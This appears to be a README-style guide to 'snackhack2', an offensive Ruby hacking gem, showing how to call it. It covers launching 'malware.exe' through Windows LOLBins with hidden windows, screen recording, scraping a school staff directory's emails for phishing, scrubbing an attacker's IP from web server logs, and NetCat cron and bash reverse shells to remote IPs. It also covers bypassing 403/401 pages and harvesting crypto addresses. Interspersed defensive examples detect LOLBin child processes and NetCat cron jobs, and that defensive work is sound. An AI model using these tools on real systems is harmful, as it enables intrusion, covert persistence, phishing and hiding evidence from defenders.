This tool comes in gem form and can also be downloaded from Github.com. Originally, this project would have been my senior project, but I had to scrap that idea for a simpler project due to my course workload and mental health.
To install the gem run the command below.
gem install snackhack2
Indirect Command Injection
When run, this code creates a pop-up with the title “CLICK ME” and the prompt text “test”. This could be used to get the target to run a command or program. Of course, the prompt and title can be changed to anything.
cj = Snackhack2::CommandInjection.new
cj.prompt = "test"
cj.title = "CLICK ME"
cj.wlrmdr_With_prompt
As the name implies, this does the same as the code above but without the prompt. By default it will run “calc.exe”, but this can be changed as seen below.
cj = Snackhack2::CommandInjection.new
cj.exe = "runme.exe"
cj.wlrmdr_without_prompt
Conhost
Conhost.exe is a LOLBin that can be used to execute commands. By default, it will execute “calc.exe”.
cj = Snackhack2::CommandInjection.new
cj.exe = "malware.exe"
cj.conhost
# This will run the same thing but the window will be hidden.
cj.conhost_hide
SSH.exe to execute command
As before, by default the code below will run “calc.exe”. This can be changed to anything.
cj = Snackhack2::CommandInjection.new
cj.exe = "runme.exe"
cj.ssh
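From the defender's side, the common thread of the wlrmdr, conhost and ssh.exe sections is that a Windows binary which normally has no children of its own is made to spawn a program. The following is an added example, not part of the gem, that flags that parent/child shape in constructed process-creation records (a simplified "parent|child" format is assumed, not a real Sysmon or 4688 export):

```ruby
# Constructed sample of process-creation events in a simplified
# "parent image|child image" format (not a real Sysmon or 4688 export).
SAMPLE_EVENTS = <<~'LOG'
  C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe|C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe|C:\Windows\System32\calc.exe
  C:\Windows\System32\conhost.exe|C:\Users\bob\AppData\Local\Temp\malware.exe
  C:\Windows\System32\OpenSSH\ssh.exe|C:\Users\bob\Downloads\runme.exe
  C:\Windows\System32\wlrmdr.exe|C:\Windows\System32\calc.exe
LOG

# The three Windows binaries the sections above use as launchers. None of them
# normally has children of its own: conhost.exe is usually the child of a
# console program, not its parent.
LAUNCHERS = %w[conhost.exe ssh.exe wlrmdr.exe].freeze
SYSTEM_DIRS = [%r{\Ac:\\windows\\system32\\}i, %r{\Ac:\\windows\\syswow64\\}i].freeze

def image_name(path)
  path.split("\\").last.to_s.downcase
end

# nil when the parent is not a launcher; :medium when the child lives in a
# system directory (the README's calc.exe default); :high otherwise.
def severity(parent, child)
  return nil unless LAUNCHERS.include?(image_name(parent))
  SYSTEM_DIRS.any? { |dir| child.match?(dir) } ? :medium : :high
end

# Parses the log and returns one record per flagged event, in log order.
def flag_launcher_children(log)
  log.lines(chomp: true).filter_map do |line|
    parent, child = line.split("|", 2)
    next if parent.nil? || child.nil?
    sev = severity(parent, child)
    sev && { parent: image_name(parent), child: child, severity: sev }
  end
end

flag_launcher_children(SAMPLE_EVENTS).each { |hit| puts hit.inspect }
```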
LolBin MSR.exe Recording Screen
The code below uses a feature built into Windows to record the screen. By default it saves the screenshots to a file named “screenshots.zip”; again, this can be easily changed. By default it records for 60 seconds, but this can also be changed as seen below.
ss = Snackhack2::ScreenShot.new
ss.time = 64
ss.run
IP Lookup
IP stands for Internet Protocol; every networked computer and website has an IP address. This feature uses nslookup and ping to find the IP of the site.
i = Snackhack2::IpLookup.new("https://x.com")
i.run
Extract Emails from Website
A hacker or pen tester needs to find targets. One way of acquiring emails is to use a spider that crawls a site and scrapes every email it finds, which could then be used for phishing. By default max_depth is 2; of course, this can be changed as in the example below.
e = Snackhack2::Email.new("https://www.tupeloschools.com/leadership/staff-directory")
# set @max_depth (defaults to two) before crawling
e.max_depth = 2
puts e.max_depth
e.run
Web Server log cleaner
This code will search web server logs for the given IP and replace it with a randomly generated IP. This is helpful for post-exploitation if a hacker or pen tester wants to remove any traces of scanning the web server or of how they exploited a vulnerability in the website.
w = Snackhack2::WebServerCleaner.new('8.1.9.2')
w.run
WordPress
WordPress is another Content Management System. This function of the code works similarly to the Drupal score system: it tries to determine whether the site is built with WordPress, and the higher the score the more likely that is. Every time the code detects something that looks like WordPress, it adds 10 to the score. There are currently 7 elements in the array that the code uses to decide whether it is a WordPress site.
require "snackhack2"
w = Snackhack2::WordPress.new("https://kinsta.com")
w.run
The code also tries to detect how many users there are and their usernames, and checks whether there are any open directories.
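The scoring described above, written out as an added example (not the gem's own code) so a site owner can check what their own page leaks. The seven markers are an assumption; the page does not show the gem's actual array, and the sample HTML is constructed:

```ruby
# Constructed sample pages, not fetched from any live site.
WP_HTML = <<~'HTML'
  <html><head>
  <meta name="generator" content="WordPress 6.4" />
  <link rel="stylesheet" href="https://example.com/wp-content/themes/demo/style.css">
  <script src="https://example.com/wp-includes/js/jquery/jquery.min.js"></script>
  <link rel="https://api.w.org/" href="https://example.com/wp-json/">
  </head><body><p>Hello</p></body></html>
HTML
PLAIN_HTML = "<html><head><title>Plain</title></head><body><p>Hello</p></body></html>"

# Seven indicators, one per README "element"; the exact list is an assumption,
# since the gem's own array is not shown on the page.
WP_MARKERS = [
  [:wp_content,  %r{/wp-content/}i],
  [:wp_includes, %r{/wp-includes/}i],
  [:generator,   /<meta[^>]+name=["']generator["'][^>]+WordPress/i],
  [:wp_json,     %r{/wp-json/}i],
  [:wp_login,    /wp-login\.php/i],
  [:xmlrpc,      /xmlrpc\.php/i],
  [:wp_emoji,    /wp-emoji/i],
].freeze
POINTS_PER_HIT = 10

# Adds 10 points per marker found and reports which markers fired, so the
# owner sees exactly which fingerprints the page exposes.
def wordpress_score(html)
  hits = WP_MARKERS.select { |_, re| html.match?(re) }.map(&:first)
  { score: hits.size * POINTS_PER_HIT,
    max: WP_MARKERS.size * POINTS_PER_HIT,
    hits: hits }
end

# Threshold of 30 (three markers) is an assumed cut-off, not the gem's.
def likely_wordpress?(html, threshold: 30)
  wordpress_score(html)[:score] >= threshold
end

puts wordpress_score(WP_HTML).inspect
```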
Examples of other possible scripts can be found here.
Reverse Shell
This prints the command to run and sets a cron job that runs every minute and uses NetCat to connect back to the server.
l = Snackhack2::ReverseShell.new("6.1.9.1", "9")
l.run
This will use bash.exe to connect to a reverse shell. On the remote computer run: “nc -lvp 4444”. After running the code below the computer will connect to the remote server, giving the threat actor remote control of the computer. This is all done by Living off the Land, without any third-party tools, just the features built into Windows. This is favored by threat actors since they do not need to install any malware that could be detected and removed.
r = Snackhack2::ReverseShell.new("1.1.1.1", "4")
r.bash
## Version 2 of bash
r.version2
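The Linux variant above leaves a very recognisable artifact: an every-minute cron entry whose command is NetCat. The following is an added example (not part of the gem) that parses a constructed crontab and flags exactly that shape; a per-minute schedule on its own is not enough, since heartbeat jobs use it too:

```ruby
# Constructed sample crontab, not captured from a real host.
SAMPLE_CRONTAB = <<~'CRON'
  # m h dom mon dow command
  0 2 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
  */15 * * * * /usr/bin/curl -s https://updates.example.com/ping
  * * * * * /usr/bin/nc 6.1.9.1 9
  * * * * * /opt/agent/heartbeat --interval 60
CRON

# nc/ncat/netcat as a command word: at line start, after whitespace, or as the
# last path component.
NETCAT = %r{(?:\A|[\s/])(?:nc|ncat|netcat)(?=\s|\z)}

# Splits each non-comment line into its five schedule fields and the command.
def parse_crontab(text)
  text.lines(chomp: true).filter_map do |line|
    next if line.strip.empty? || line.lstrip.start_with?("#")
    fields = line.split(/\s+/, 6)
    next unless fields.size == 6
    { schedule: fields.first(5), command: fields[5] }
  end
end

def every_minute?(schedule)
  schedule.all? { |f| f == "*" }
end

# Both conditions are required: every-minute schedule AND a NetCat command.
def suspicious_cron_entries(text)
  parse_crontab(text).select do |e|
    every_minute?(e[:schedule]) && e[:command].match?(NETCAT)
  end
end

suspicious_cron_entries(SAMPLE_CRONTAB).each { |e| puts e[:command] }
```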
List Users
Search for a given user on Windows.
lu = Snackhack2::ListUsers.new
lu.user = "admin"
lu.windows_search_user
List users on Linux-based systems by viewing the “/etc/passwd” file.
lu = Snackhack2::ListUsers.new
lu.linux
The code below will list all the users on a Windows-based system.
lu = Snackhack2::ListUsers.new
lu.windows
Bypassing 403 & 401
This code performs a number of small tricks that will hopefully bypass the protected pages. It might take a while because it works through a list of web paths.
ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.dots
ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.basic
ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.uppercase
ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.url_encode
Extract Crypto Addresses
- Monero
- Bitcoin
- Litecoin
- Dash
- Stellar
- Ethereum
- Bitcoin Cash
- Dogecoin
ca = Snackhack2::CryptoExtractWebsite.new("https://coincarp.com/currencies/tron/richlist/")
puts ca.save_file
ca.save_file = false
puts ca.save_file
ca.run
ca.monero
ca.bitcoin
ca.litecoin
ca.dash
ca.stellar
ca.ethereum
ca.bitcoincash
ca.dogecoin
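The same eight-currency extraction, as an added example that is not the gem's code, useful to an analyst pulling wallet indicators out of a captured phishing or scam page. The patterns are assumed address formats (the page gives none); the sample text is constructed and the only real value in it is Bitcoin's well-known genesis-block address:

```ruby
# One pattern per currency the README lists. Legacy base58 addresses share a
# prefix space (a "3..." address can be Bitcoin P2SH or Litecoin), so the
# Litecoin pattern only claims the unambiguous L/M and ltc1 forms.
CRYPTO_PATTERNS = {
  monero:      /\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b/,
  bitcoin:     /\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{39,59})\b/,
  litecoin:    /\b(?:[LM][a-km-zA-HJ-NP-Z1-9]{26,33}|ltc1[a-z0-9]{39,59})\b/,
  dash:        /\bX[1-9A-HJ-NP-Za-km-z]{33}\b/,
  stellar:     /\bG[A-Z2-7]{55}\b/,
  ethereum:    /\b0x[a-fA-F0-9]{40}\b/,
  bitcoincash: /\b(?:bitcoincash:)?[qp][a-z0-9]{41}\b/,
  dogecoin:    /\bD[5-9A-HJ-NP-U][1-9A-HJ-NP-Za-km-z]{32}\b/,
}.freeze

# Returns { currency => [unique addresses] } for every currency, empty arrays
# included, so callers can tell "not found" from "not checked".
def extract_crypto_addresses(text)
  CRYPTO_PATTERNS.to_h { |name, re| [name, text.scan(re).uniq] }
end

# Constructed sample page text. The Stellar and Dogecoin values are synthetic
# strings shaped like addresses; the Bitcoin one is the genesis-block address.
SAMPLE_PAGE = <<~TEXT
  Send BTC to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa or ETH to
  0x742d35Cc6634C0532925a3b844Bc454e4438f44e. Stellar:
  GABCDEFGHIJKLMNOPQRSTUVWXYZ234567ABCDEFGHIJKLMNOPQRSTUVW
  DOGE: D5#{"A" * 32}. Order #1234567890123456789012345 is not an address.
TEXT

extract_crypto_addresses(SAMPLE_PAGE).each do |name, addrs|
  puts "#{name}: #{addrs.inspect}"
end
```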
SiteMap XML
sm = Snackhack2::SiteMap.new("https://x.com")
sm.run